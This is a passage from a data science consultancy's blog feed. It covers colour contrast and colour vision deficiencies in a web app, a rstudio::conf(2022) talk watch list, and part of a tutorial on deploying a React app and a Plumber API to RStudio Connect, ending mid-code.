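  return (Math.max(la, lb) + 0.05) / (Math.min(la, lb) + 0.05);
}

// Level AA: at least 4.5:1 for normal text, 3:1 for large text.
function meetsAA(a: Rgb, b: Rgb, largeText = false): boolean {
  return contrastRatio(a, b) >= (largeText ? 3 : 4.5);
}
```

&lt;p&gt;For example, &lt;code&gt;contrastRatio([0, 0, 0], [255, 255, 255])&lt;/code&gt; comes out at 21, the maximum possible, while identical foreground and background colours give a ratio of 1.&lt;/p&gt;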
&lt;h2 id="colour-vision-deficiencies-and-colour-blindness"&gt;Colour vision deficiencies and colour blindness&lt;/h2&gt;
&lt;p&gt;The terminology around colour vision deficiencies can be confusing.&lt;/p&gt;
&lt;p&gt;People with normal colour vision have three types of functioning colour-sensitive cells in their eyes and are said to be &amp;ldquo;trichromats&amp;rdquo; (from the Greek &amp;ldquo;tri&amp;rdquo; =&amp;gt; three and &amp;ldquo;chroma&amp;rdquo; =&amp;gt; colour). Those cells are called &amp;ldquo;cones&amp;rdquo; and have different wavelength peak sensitivities. These are sometimes referred to as &amp;ldquo;red&amp;rdquo;, &amp;ldquo;green&amp;rdquo; and &amp;ldquo;blue&amp;rdquo; cones, but more accurate terms are &amp;ldquo;long&amp;rdquo; (&amp;ldquo;L&amp;rdquo;), &amp;ldquo;medium&amp;rdquo; (&amp;ldquo;M&amp;rdquo;) and &amp;ldquo;short&amp;rdquo; (&amp;ldquo;S&amp;rdquo;) in reference to those wavelengths. The chart below (from the Wikipedia article on &lt;a href="https://en.wikipedia.org/wiki/Cone_cell" rel="external"&gt;cone cells&lt;/a&gt;) shows that the peak sensitivity of the L cone cells is actually in the yellow part of the visible spectrum, not the red.&lt;/p&gt;
&lt;img src="images/cones.svg" alt="A line graph showing the normalised responses of the three types of cone cell as a function of the wavelength of incident light. An underlay shows the visible spectrum itself, going from blue to red The peak sensitivity of the L cone is actually in the yellow part of the spectrum." /&gt;
&lt;p&gt;Some people only have two types of functional cones. Correspondingly they are called &amp;ldquo;dichromats&amp;rdquo;. People lacking functional L cones are &amp;ldquo;protanopes&amp;rdquo; while those lacking functional M cones are &amp;ldquo;deuteranopes&amp;rdquo; and those without functional S cones are &amp;ldquo;tritanopes&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Alongside true dichromacy there is also &amp;ldquo;anomalous trichromacy&amp;rdquo;. Anomalous trichromats have three functional types of cones, but one type does not function as expected. These three conditions are then referred to as &amp;ldquo;protanomaly&amp;rdquo;, &amp;ldquo;deuteranomaly&amp;rdquo; and &amp;ldquo;tritanomaly&amp;rdquo;.&lt;/p&gt;
&lt;p&gt;Collectively, sufferers from these conditions are often said to be &amp;ldquo;colour blind&amp;rdquo;. However, all sufferers can see colour so this is something of a misnomer. Nevertheless, &amp;ldquo;protans&amp;rdquo; (those who suffer from protanopia or protanomaly) and &amp;ldquo;deutans&amp;rdquo; (deuteranopia or deuteranomaly) are often said to have red-green colour blindness while &amp;ldquo;tritans&amp;rdquo; (tritanopia or tritanomaly) may be said to have blue-yellow colour blindness.&lt;/p&gt;
&lt;p&gt;Collectively, the groups that are said to exhibit red-green colour blindness are much larger than the groups said to exhibit blue-yellow colour blindness. But it&amp;rsquo;s important to stress that this &lt;em&gt;does not&lt;/em&gt; mean we simply avoid pairing two colours we semantically refer to as &amp;ldquo;red&amp;rdquo; and &amp;ldquo;green&amp;rdquo; together. It&amp;rsquo;s more complicated than that: Trichromats see colour in a three-dimensional space, dichromats see colour in a two-dimensional space and the names we give to colours occupy a somewhat fuzzy, somewhat discrete space.&lt;/p&gt;
&lt;p&gt;The image below shows a screenshot of the Functions section of &lt;a href="https://diffify.com/R/ggplot2/3.3.2/3.3.6" rel="external"&gt;diffify&lt;/a&gt; for the {ggplot2} package using the default theme that most users will see when they visit the site for the first time. Overlaid on the bottom-left half of the image is a simulation (we used &lt;a href="https://michelf.ca/projects/sim-daltonism/" rel="external"&gt;Sim Daltonism&lt;/a&gt;, more on that in Part 2) of how the screenshot would appear to a user with deuteranopia.&lt;/p&gt;
&lt;img src="images/default-deut.png" srcset="images/default-deut@2x.png 2x" alt="A screenshot of a section from diffify using the default theme. The top-right half of the image assumes normal vision. The bottom-left half of the image applies a deuternopia filter using the Sim Daltonism software." /&gt;
&lt;p&gt;The simulation suggests that deuteranopes might struggle to see the difference between the colours used for &amp;ldquo;Added&amp;rdquo; and &amp;ldquo;Removed&amp;rdquo; buttons and entries. There is additional encoding with the plus and minus symbols, but we wanted to offer something better.&lt;/p&gt;
&lt;p&gt;Other, more extreme, colour vision deficiencies exist including several forms of &amp;ldquo;monochromacy&amp;rdquo;. &amp;ldquo;Monochromats&amp;rdquo; can only distinguish colours through their brightness. These conditions (where the term &amp;ldquo;colour blind&amp;rdquo; is, perhaps, more appropriate) are very rare and so won&amp;rsquo;t be covered further here.&lt;/p&gt;
&lt;h2 id="coming-up"&gt;Coming Up&lt;/h2&gt;
&lt;p&gt;In Part 2 I&amp;rsquo;ll cover what theming is, how we used it to improve &lt;a href="https://diffify.com/" rel="external"&gt;diffify&lt;/a&gt; and the tools we used to help us test our improvements.&lt;/p&gt;
&lt;p&gt;Of course we aren&amp;rsquo;t claiming we&amp;rsquo;ve got everything right. If you think there&amp;rsquo;s anything we missed or just got wrong, please do let us know by raising an issue in the &lt;a href="https://github.com/jumpingrivers/diffify/issues" rel="external"&gt;diffify github repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/theming-diffify-accessibility-1/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>RStudio2022: Talks to watch out for</title><link>https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/</link><pubDate>Tue, 26 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.rstudio.com/conference/" rel="external"&gt;rstudio::conf(2022)&lt;/a&gt; is well underway and, after two days of workshops, the main talks begin tomorrow. Here are our highlights of talks we&amp;rsquo;re most excited about!&lt;/p&gt;
&lt;h3 id="the-past-and-future-of-shiny"&gt;The Past and Future of Shiny&lt;/h3&gt;
&lt;p&gt;If you are interested in Shiny, then this &lt;a href="https://rstudioconf2022.sched.com/event/11iZl/the-past-and-future-of-shiny" rel="external"&gt;keynote&lt;/a&gt; by Joe Cheng will be top of your list. As he says in his abstract, it&amp;rsquo;s hard to believe that Shiny was released ten years ago.&lt;/p&gt;
&lt;p&gt;Why attend: Shiny is key to a lot of what we do at &lt;a href="https://jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;. We build, maintain and deploy apps weekly, if not daily!&lt;/p&gt;
&lt;h3 id="packages-and-process"&gt;Packages and Process&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://rstudioconf2022.sched.com/event/11iYK/packages-and-process" rel="external"&gt;Ellis Hughes&lt;/a&gt; is talking about how his team use R packages to help streamline processes at
GSK. Since he works in a validated environment, he has particular challenges to overcome.&lt;/p&gt;
&lt;p&gt;Why attend: I think we&amp;rsquo;re pretty slick with packages at Jumping Rivers. However,
there is always something to improve.&lt;/p&gt;
&lt;h3 id="dbcooper-turn-any-database-into-an-r-or-python-package"&gt;dbcooper: Turn any database into an R or Python package&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://rstudioconf2022.sched.com/event/11iZi/dbcooper-turn-any-database-into-an-r-or-python-package" rel="external"&gt;David Robinson&lt;/a&gt; is going to discuss the {dbcooper} package, which turns a database connection into a collection of accessor functions, letting users take advantage of autocomplete as they browse a database in the same ways they would engage with local tables.&lt;/p&gt;
&lt;p&gt;Why attend: I understand the concept, but would like to understand how the package would be used in anger. Also, David is an excellent speaker!&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-rstudio2022-talks-watch-list"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="these-are-a-few-of-my-favorite-things-about-quarto-presentations"&gt;These are a few of my favorite things (about Quarto presentations)&lt;/h3&gt;
&lt;p&gt;In this talk, &lt;a href="https://rstudioconf2022.sched.com/event/11ibN/these-are-a-few-of-my-favorite-things-about-quarto-presentations" rel="external"&gt;Tracy Teal&lt;/a&gt; will discuss some of the best things about making interactive HTML presentations with Quarto.&lt;/p&gt;
&lt;p&gt;Why attend: I&amp;rsquo;ve been using RMarkdown for presentations for a while and recently switched to Quarto, so I&amp;rsquo;m curious to explore the features I haven&amp;rsquo;t found yet.&lt;/p&gt;
&lt;h3 id="r-python-and-tableau-a-love-triangle"&gt;R, Python, and Tableau: A Love Triangle&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://rstudioconf2022.sched.com/event/11iYQ/r-python-and-tableau-a-love-triangle" rel="external"&gt;James Blair&lt;/a&gt; will discuss how users can gain more advanced analytic capabilities in their Tableau dashboards by also using R and Python.&lt;/p&gt;
&lt;p&gt;Why attend: At Jumping Rivers we&amp;rsquo;re already a bilingual company who use both R and Python, and we&amp;rsquo;ve recently started using Tableau as well. I&amp;rsquo;m excited to see how all three work together at once!&lt;/p&gt;
&lt;h3 id="what-they-forgot-to-teach-you-about-becoming-an-open-source-contributor"&gt;What they forgot to teach you about becoming an open source contributor&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://rstudioconf2022.sched.com/event/11iZf/what-they-forgot-to-teach-you-about-becoming-an-open-source-contributor" rel="external"&gt;Nic Crane&lt;/a&gt; will be talking about their journey from occasional open source contributor to full time project maintainer, and answering some of the unknowns about contributing to open source projects.&lt;/p&gt;
&lt;p&gt;Why attend: Open source projects are one of the best parts of the R community, and something we&amp;rsquo;re passionate about at Jumping Rivers.&lt;/p&gt;
&lt;h2 id="jumping-rivers-talks--events"&gt;Jumping Rivers Talks / Events&lt;/h2&gt;
&lt;h3 id="comparing-package-versions-with-diffify"&gt;Comparing package versions with Diffify&lt;/h3&gt;
&lt;p&gt;Colin will be talking about &lt;a href="https://rstudioconf2022.sched.com/event/11ia3/comparing-package-versions-with-diffify" rel="external"&gt;diffify.com&lt;/a&gt; in a lightning talk. diffify is a tool that allows you to easily compare package versions.&lt;/p&gt;
&lt;h3 id="say-hello-to-multilingual-shiny-apps"&gt;Say Hello! to Multilingual Shiny Apps&lt;/h3&gt;
&lt;p&gt;In a lightning talk, Nicola will be discussing how we built a &lt;a href="https://rstudioconf2022.sched.com/event/11iaI/say-hello-to-multilingual-shiny-apps" rel="external"&gt;multilingual Shiny app&lt;/a&gt;, why it&amp;rsquo;s important, and why it&amp;rsquo;s not so simple.&lt;/p&gt;
&lt;h3 id="birds-of-a-feather-government-public-sector"&gt;Birds of a Feather: Government Public Sector&lt;/h3&gt;
&lt;p&gt;If you work in Government or the Public sector, make sure you attend the lunchtime &lt;a href="https://rstudioconf2022.sched.com/event/137lR/birds-of-a-feather-lunch-several-groups" rel="external"&gt;Birds of a Feather&lt;/a&gt;. BoF allows you to meet people from the same industry to discuss your challenges and successes!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/rstudio2022-talks-watch-list/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Recreating the Shiny App tutorial with a Plumber API + React: Part 3</title><link>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/</link><pubDate>Thu, 21 Jul 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-3/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part three of our three part series&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-part-1" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/r-shiny-plumber-react-node-npm-part-2" rel="external"&gt;Recreating the Shiny App tutorial with a Plumber API + React: Part 2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Recreating the Shiny App tutorial with a Plumber API + React: Part 3 (this post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So far, we have seen how to create an app using ReactJS and a Plumber API. In part 3, we will show you how to host the application on RStudio Connect (RSC)!&lt;/p&gt;
&lt;p&gt;When it comes to hosting the application on RSC we will set the content URL for both the app and API so that they are in the same domain and won&amp;rsquo;t have this CORS issue.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://{YOUR_CONNECT_SERVER_HERE}/stf/api/
https://{YOUR_CONNECT_SERVER_HERE}/stf/react/
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Both the app and the API will then sit under the same base URL:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;https://{YOUR_CONNECT_SERVER_HERE}/stf/
&lt;/code&gt;&lt;/pre&gt;&lt;h3 id="preparing-the-build-for-rstudio-connect"&gt;Preparing the Build for RStudio Connect&lt;/h3&gt;
&lt;p&gt;To prepare the build for RStudio Connect, we need to make a couple of changes so that it is deployable.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;public/&lt;/code&gt; folder in React is great for storing static assets such as images, fonts, and JS files. It is located within the &lt;code&gt;app/&lt;/code&gt; directory. Any files placed in this folder will be copied into the build folder when you run the build script. This is useful if you need to reference a file in your code that is not JavaScript, such as an image. For example, if you have an image named &lt;code&gt;logo.png&lt;/code&gt; in your public folder, you would reference it in your code like this: &lt;code&gt;/logo.png&lt;/code&gt;. It&amp;rsquo;s important to note that the &lt;code&gt;public&lt;/code&gt; folder is only for static assets.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-r-shiny-plumber-react-part-3"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;The public folder contains the HTML which can be changed to set things like the page title. The &lt;code&gt;&amp;lt;script&amp;gt;&lt;/code&gt; tag with the compiled code will be added to it automatically during the build process. In index.html you might notice that there are links to various files from the public folder.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;manifest&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/manifest.json&amp;#34;&lt;/span&gt; crossOrigin&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;use-credentials&amp;#34;&lt;/span&gt;/&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#7ee787"&gt;link&lt;/span&gt; rel&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;apple-touch-icon&amp;#34;&lt;/span&gt; href&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;%PUBLIC_URL%/logo192.png&amp;#34;&lt;/span&gt; /&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In the above code, &lt;code&gt;%PUBLIC_URL%&lt;/code&gt; is a placeholder that is replaced during the build with the URL of the application&amp;rsquo;s public folder. Missing files are not detected at compilation time, and will cause 404 errors at runtime. Likewise, if the value behind &lt;code&gt;%PUBLIC_URL%&lt;/code&gt; is incorrect, we will receive 404 errors when accessing the deployed build.&lt;/p&gt;
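&lt;p&gt;To make the substitution concrete, here is a minimal sketch of the idea in JavaScript. It is an illustration only, not the build tool&amp;rsquo;s actual implementation: the function name &lt;code&gt;fillPublicUrl&lt;/code&gt; and the example server address are assumptions made for this example.&lt;/p&gt;

```javascript
// Illustration only: substitute the %PUBLIC_URL% placeholder in a string,
// roughly mirroring what happens to index.html during the build.
// fillPublicUrl is a hypothetical helper, not part of any library.
function fillPublicUrl(template, publicUrl) {
  // Drop trailing slashes so "%PUBLIC_URL%/file" never yields "//file".
  const base = publicUrl.replace(/\/+$/, "");
  // Replace every occurrence of the placeholder with the base URL.
  return template.split("%PUBLIC_URL%").join(base);
}

// Example address is an assumption; use your own content URL.
console.log(fillPublicUrl("%PUBLIC_URL%/logo192.png", "https://example.com/stf/react/"));
```

&lt;p&gt;If the base URL passed in does not match where the app is really served, the resulting link points at a location that does not exist, which is where the 404 errors come from.&lt;/p&gt;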
&lt;p&gt;The next minor issue is that we are using a hardcoded URL for our API. When developing locally, we probably want to use the locally hosted URL, e.g. &lt;code&gt;localhost:8000&lt;/code&gt;. When we deploy both the API and app to RSC, we want to change this to the URL of our production API, which we will know once we&amp;rsquo;ve deployed it to RSC.&lt;/p&gt;
&lt;p&gt;We can extract these values out into environment variables that can change between development and production environments. We do this by creating two files &lt;code&gt;.env.production&lt;/code&gt; and &lt;code&gt;.env.development&lt;/code&gt; in the root directory of the app.&lt;/p&gt;
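&lt;p&gt;As a rough sketch of how the app might consume such a variable, the snippet below reads the API URL from an environment-like object and falls back to a local address when it is unset. It assumes tooling that exposes variables prefixed with &lt;code&gt;REACT_APP_&lt;/code&gt; on &lt;code&gt;process.env&lt;/code&gt; at build time; the helper name &lt;code&gt;resolveApiUrl&lt;/code&gt; and the fallback address are hypothetical.&lt;/p&gt;

```javascript
// Hypothetical helper: pick the API URL from an env-like object,
// falling back to a local development address when the variable is unset.
function resolveApiUrl(env, fallback = "http://localhost:8000") {
  const value = env.REACT_APP_PUBLIC_API_URL;
  // Treat undefined and empty strings as "not configured".
  if (value === undefined || value === "") {
    return fallback;
  }
  return value;
}

// In the app this would typically be called as resolveApiUrl(process.env).
console.log(resolveApiUrl({ REACT_APP_PUBLIC_API_URL: "https://example.com/stf/api/" }));
console.log(resolveApiUrl({}));
```

&lt;p&gt;Keeping the lookup in one place means the rest of the code never needs to know which environment it is running in.&lt;/p&gt;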
&lt;p&gt;Within the &lt;code&gt;.env.development&lt;/code&gt; we can add&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;PUBLIC_URL=localhost:3000
REACT_APP_PUBLIC_API_URL=localhost:8000
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Within &lt;code&gt;.env.production&lt;/code&gt; we need to add the URL of the RStudio Connect platform that we are deploying to. In RSC you can also set a content URL for your content. We&amp;rsquo;re going to set these variables to the content URLs that we will configure later when deploying to RSC:&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;PUBLIC_URL=https://{YOUR_CONNECT_SERVER_HERE}/stf/api/
REACT_APP_PUBLIC_API_URL=https://{YOUR_CONNECT_SERVER_HERE}/stf/react/
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Within the &lt;code&gt;App.js&lt;/code&gt; file we need to change the &lt;code&gt;onSliderChange()&lt;/code&gt; function to use this newly defined &lt;code&gt;REACT_APP_PUBLIC_API_URL&lt;/code&gt; environment variable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-JSX" data-lang="JSX"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; onSliderChange(input) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;var&lt;/span&gt; apiURL &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; process.env.REACT_APP_PUBLIC_API_URL;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; axios.get(&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;${&lt;/span&gt;apiURL&lt;span style="color:#a5d6ff"&gt;}&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;`&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; params&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bins&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; input,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }).then((data) =&amp;gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.setState({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rawdata&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; y&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;counts&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; x&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; data.data.map(x =&amp;gt; x[&lt;span style="color:#a5d6ff"&gt;&amp;#34;mids&amp;#34;&lt;/span&gt;]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; type&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;bar&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="building-the-application"&gt;Building the Application&lt;/h3&gt;
&lt;p&gt;From our application folder, we want to run the following to create a production build of our React application:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;npm run-script build
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The build process in React is responsible for converting the source code into a form that can be executed by the browser. This process includes several steps, such as transpiling, bundling, and optimization.&lt;/p&gt;
&lt;p&gt;During transpilation, the source code is converted from one format to another. For example, it can be converted from JSX to JavaScript. This step is necessary because browsers cannot understand JSX directly.&lt;/p&gt;
&lt;p&gt;After transpilation, the code is bundled into static minified files. Bundling helps to reduce the size of the code and make it more efficient to load.&lt;/p&gt;
&lt;p&gt;Finally, the code is optimized for performance. This may include minification, which reduces the size of the code, and dead code elimination, which removes unused code from the bundle. By optimizing the code, the build aims to run quickly and efficiently in the browser.&lt;/p&gt;
&lt;h3 id="the-manifest-file"&gt;The Manifest File&lt;/h3&gt;
&lt;p&gt;To deploy content to RStudio Connect a manifest.json file is required. A manifest file for RStudio Connect is a list of the files that need to be deployed in order for content to run. This list includes both the source code files and any dependencies that are required. The manifest file ensures that all of the necessary files are included in the deployment, and it also provides a way to specify the order in which the files should be deployed. This is important because some files may need to be deployed before others in order for everything to work correctly. The manifest file is typically named &lt;code&gt;manifest.json&lt;/code&gt; and it is placed in the same directory as the rest of the files that need to be deployed.&lt;/p&gt;
&lt;p&gt;We can create a manifest file with the {rsconnect} R package.&lt;/p&gt;
&lt;h3 id="the-rsconnect-r-package"&gt;The rsconnect R package&lt;/h3&gt;
&lt;p&gt;The {rsconnect} R package makes it easy to deploy R code and other applications such as our React app to RStudio Connect. You can get your code up and running on RSC with minimal configuration in just a few simple steps. All you need is an RSC server and an account with privileges to deploy content.&lt;/p&gt;
&lt;p&gt;If we haven&amp;rsquo;t installed the package we can install it with &lt;code&gt;install.packages(&amp;quot;rsconnect&amp;quot;)&lt;/code&gt; from within an R session.&lt;/p&gt;
&lt;p&gt;You will then need to register your RStudio Connect user with the package by specifying your account name and server URL:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rsconnect&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;addConnectServer&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://myserveraddress:3939&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;myserver&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;connectUser&lt;/span&gt;(server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;myserver&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The {rsconnect} server name, &lt;code&gt;myserver&lt;/code&gt;, is an arbitrary name that is used to identify an RSC server when using {rsconnect}. You can choose any name you wish.&lt;/p&gt;
&lt;p&gt;The output of this command will prompt you with a link to your RSC server asking you to authenticate.&lt;/p&gt;
&lt;p&gt;We need to create manifest files for both the app build directory and the API directory. We can do this via &lt;code&gt;rsconnect::writeManifest(appDir = 'path/to/app/build/')&lt;/code&gt;, where the &lt;code&gt;appDir&lt;/code&gt; argument specifies the path to the directory. The default value for &lt;code&gt;appDir&lt;/code&gt; is the current working directory, so if you start the R session in the directory you need to write a manifest for, there is no need to specify any arguments, e.g. &lt;code&gt;rsconnect::writeManifest()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Once both manifests are created we can use the following functions to deploy the app and API&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-R" data-lang="R"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;rsconnect&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;rsconnect&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;deployApp&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; appDir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;path/to/api/directory&amp;#39;&lt;/span&gt;
